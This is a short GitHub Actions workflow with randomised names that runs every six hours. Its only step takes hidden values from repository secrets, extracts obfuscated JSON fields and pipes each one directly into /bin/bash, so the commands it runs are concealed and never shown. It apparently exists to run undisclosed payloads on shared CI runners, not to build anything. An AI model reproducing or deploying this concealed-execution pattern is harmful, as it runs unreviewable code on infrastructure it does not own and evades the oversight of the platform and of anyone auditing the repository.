name: weiyuanbv

on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weiyuanbv
        env:
          ma1: ${{ secrets.ma1 }}
        run: |
          echo $ma1 | jq -r .riwo1109 | /bin/bash
          echo $s540 | jq -r .j47 | /bin/bash
          echo $xb3 | jq -r .o6201 | /bin/bash
          echo $aejr04719 | jq -r .x6030 | /bin/bash
          echo $vnr2423 | jq -r .xfu582 | /bin/bash
          echo $w7 | jq -r .zhwl72094 | /bin/bash
          echo $pyudk441 | jq -r .uqy73 | /bin/bash
          echo $aft710 | jq -r .mb847 | /bin/bash
          echo $cp7762 | jq -r .iul3 | /bin/bash
          echo $jy2411 | jq -r .ba2948 | /bin/bash
          echo $ae19594 | jq -r .tp761 | /bin/bash

